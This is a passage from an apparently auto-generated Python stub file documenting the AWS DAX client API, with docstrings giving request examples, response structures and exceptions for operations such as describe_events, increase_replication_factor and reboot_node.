DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Clusters': [
{
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
},
]
}
:returns:
(string) --
"""
pass
def describe_default_parameters(MaxResults=None, NextToken=None):
"""
Returns the default system parameter information for the DAX caching software.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_default_parameters(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Parameters (list) --
A list of parameters. Each element in the list represents one parameter.
(dict) --
Describes an individual setting that controls some aspect of DAX behavior.
ParameterName (string) --
The name of the parameter.
ParameterType (string) --
Determines whether the parameter can be applied to any nodes, or only nodes of a particular type.
ParameterValue (string) --
The value for the parameter.
NodeTypeSpecificValues (list) --
A list of node types, and specific parameter values for each node.
(dict) --
Represents a parameter value that is applicable to a particular node type.
NodeType (string) --
A node type to which the parameter value applies.
Value (string) --
The parameter value for this node type.
Description (string) --
A description of the parameter
Source (string) --
How the parameter is defined. For example, system denotes a system-defined parameter.
DataType (string) --
The data type of the parameter. For example, integer :
AllowedValues (string) --
A range of values within which the parameter can be set.
IsModifiable (string) --
Whether the customer is allowed to modify the parameter.
ChangeType (string) --
The conditions under which changes to this parameter can be applied. For example, requires-reboot indicates that a new value for this parameter will only take effect if a node is rebooted.
Exceptions
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
:returns:
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def describe_events(SourceName=None, SourceType=None, StartTime=None, EndTime=None, Duration=None, MaxResults=None, NextToken=None):
"""
Returns events related to DAX clusters and parameter groups. You can obtain events specific to a particular DAX cluster or parameter group by providing the name as a parameter.
By default, only the events occurring within the last 24 hours are returned; however, you can retrieve up to 14 days\' worth of events if necessary.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_events(
SourceName='string',
SourceType='CLUSTER'|'PARAMETER_GROUP'|'SUBNET_GROUP',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1),
Duration=123,
MaxResults=123,
NextToken='string'
)
:type SourceName: string
:param SourceName: The identifier of the event source for which events will be returned. If not specified, then all sources are included in the response.
:type SourceType: string
:param SourceType: The event source to retrieve events for. If no value is specified, all events are returned.
:type StartTime: datetime
:param StartTime: The beginning of the time interval to retrieve events for, specified in ISO 8601 format.
:type EndTime: datetime
:param EndTime: The end of the time interval for which to retrieve events, specified in ISO 8601 format.
:type Duration: integer
:param Duration: The number of minutes\' worth of events to retrieve.
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Events': [
{
'SourceName': 'string',
'SourceType': 'CLUSTER'|'PARAMETER_GROUP'|'SUBNET_GROUP',
'Message': 'string',
'Date': datetime(2015, 1, 1)
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Events (list) --
An array of events. Each element in the array represents one event.
(dict) --
Represents a single occurrence of something interesting within the system. Some examples of events are creating a DAX cluster, adding or removing a node, or rebooting a node.
SourceName (string) --
The source of the event. For example, if the event occurred at the node level, the source would be the node ID.
SourceType (string) --
Specifies the origin of this event - a cluster, a parameter group, a node ID, etc.
Message (string) --
A user-defined message associated with the event.
Date (datetime) --
The date and time when the event occurred.
Exceptions
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Events': [
{
'SourceName': 'string',
'SourceType': 'CLUSTER'|'PARAMETER_GROUP'|'SUBNET_GROUP',
'Message': 'string',
'Date': datetime(2015, 1, 1)
},
]
}
:returns:
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def describe_parameter_groups(ParameterGroupNames=None, MaxResults=None, NextToken=None):
"""
Returns a list of parameter group descriptions. If a parameter group name is specified, the list will contain only the descriptions for that group.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_parameter_groups(
ParameterGroupNames=[
'string',
],
MaxResults=123,
NextToken='string'
)
:type ParameterGroupNames: list
:param ParameterGroupNames: The names of the parameter groups.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'ParameterGroups': [
{
'ParameterGroupName': 'string',
'Description': 'string'
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
ParameterGroups (list) --
An array of parameter groups. Each element in the array represents one parameter group.
(dict) --
A named set of parameters that are applied to all of the nodes in a DAX cluster.
ParameterGroupName (string) --
The name of the parameter group.
Description (string) --
A description of the parameter group.
Exceptions
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'ParameterGroups': [
{
'ParameterGroupName': 'string',
'Description': 'string'
},
]
}
:returns:
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def describe_parameters(ParameterGroupName=None, Source=None, MaxResults=None, NextToken=None):
"""
Returns the detailed parameter list for a particular parameter group.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_parameters(
ParameterGroupName='string',
Source='string',
MaxResults=123,
NextToken='string'
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group.\n
:type Source: string
:param Source: How the parameter is defined. For example, system denotes a system-defined parameter.
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Parameters (list) --
A list of parameters within a parameter group. Each element in the list represents one parameter.
(dict) --
Describes an individual setting that controls some aspect of DAX behavior.
ParameterName (string) --
The name of the parameter.
ParameterType (string) --
Determines whether the parameter can be applied to any nodes, or only nodes of a particular type.
ParameterValue (string) --
The value for the parameter.
NodeTypeSpecificValues (list) --
A list of node types, and specific parameter values for each node.
(dict) --
Represents a parameter value that is applicable to a particular node type.
NodeType (string) --
A node type to which the parameter value applies.
Value (string) --
The parameter value for this node type.
Description (string) --
A description of the parameter
Source (string) --
How the parameter is defined. For example, system denotes a system-defined parameter.
DataType (string) --
The data type of the parameter. For example, integer :
AllowedValues (string) --
A range of values within which the parameter can be set.
IsModifiable (string) --
Whether the customer is allowed to modify the parameter.
ChangeType (string) --
The conditions under which changes to this parameter can be applied. For example, requires-reboot indicates that a new value for this parameter will only take effect if a node is rebooted.
Exceptions
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
:returns:
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def describe_subnet_groups(SubnetGroupNames=None, MaxResults=None, NextToken=None):
"""
Returns a list of subnet group descriptions. If a subnet group name is specified, the list will contain only the description of that group.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_subnet_groups(
SubnetGroupNames=[
'string',
],
MaxResults=123,
NextToken='string'
)
:type SubnetGroupNames: list
:param SubnetGroupNames: The name of the subnet group.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'SubnetGroups': [
{
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
SubnetGroups (list) --
An array of subnet groups. Each element in the array represents a single subnet group.
(dict) --
Represents the output of one of the following actions:
CreateSubnetGroup
ModifySubnetGroup
SubnetGroupName (string) --
The name of the subnet group.
Description (string) --
The description of the subnet group.
VpcId (string) --
The Amazon Virtual Private Cloud identifier (VPC ID) of the subnet group.
Subnets (list) --
A list of subnets associated with the subnet group.
(dict) --
Represents the subnet associated with a DAX cluster. This parameter refers to subnets defined in Amazon Virtual Private Cloud (Amazon VPC) and used with DAX.
SubnetIdentifier (string) --
The system-assigned identifier for the subnet.
SubnetAvailabilityZone (string) --
The Availability Zone (AZ) for the subnet.
Exceptions
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'NextToken': 'string',
'SubnetGroups': [
{
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
},
]
}
:returns:
CreateSubnetGroup
ModifySubnetGroup
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def increase_replication_factor(ClusterName=None, NewReplicationFactor=None, AvailabilityZones=None):
"""
Adds one or more nodes to a DAX cluster.
See also: AWS API Documentation
Exceptions
:example: response = client.increase_replication_factor(
ClusterName='string',
NewReplicationFactor=123,
AvailabilityZones=[
'string',
]
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster that will receive additional nodes.\n
:type NewReplicationFactor: integer
:param NewReplicationFactor: [REQUIRED]\nThe new number of nodes for the DAX cluster.\n
:type AvailabilityZones: list
:param AvailabilityZones: The Availability Zones (AZs) in which the cluster nodes will be created. All nodes belonging to the cluster are placed in these Availability Zones. Use this parameter if you want to distribute the nodes across multiple AZs.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster. with its new replication factor.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.InsufficientClusterCapacityFault
DAX.Client.exceptions.InvalidVPCNetworkStateFault
DAX.Client.exceptions.NodeQuotaForClusterExceededFault
DAX.Client.exceptions.NodeQuotaForCustomerExceededFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
def list_tags(ResourceName=None, NextToken=None):
"""
List all of the tags for a DAX cluster. You can call ListTags up to 10 times per second, per account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags(
ResourceName='string',
NextToken='string'
)
:type ResourceName: string
:param ResourceName: [REQUIRED]\nThe name of the DAX resource to which the tags belong.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token.
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Tags (list) --
A list of tags currently associated with the DAX cluster.
(dict) --
A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.
AWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .
You cannot backdate the application of a tag.
Key (string) --
The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.
Value (string) --
The value of the tag. Tag values are case-sensitive and can be null.
NextToken (string) --
If this value is present, there are additional results to be displayed. To retrieve them, call ListTags again, with NextToken set to this value.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
:returns:
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def reboot_node(ClusterName=None, NodeId=None):
"""
Reboots a single node of a DAX cluster. The reboot action takes place as soon as possible. During the reboot, the node status is set to REBOOTING.
See also: AWS API Documentation
Exceptions
:example: response = client.reboot_node(
ClusterName='string',
NodeId='string'
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster containing the node to be rebooted.\n
:type NodeId: string
:param NodeId: [REQUIRED]\nThe system-assigned ID of the node to be rebooted.\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster after a node has been rebooted.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.NodeNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
def tag_resource(ResourceName=None, Tags=None):
"""
Associates a set of tags with a DAX resource. You can call TagResource up to 5 times per second, per account.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]\nThe name of the DAX resource to which tags should be added.\n
:type Tags: list
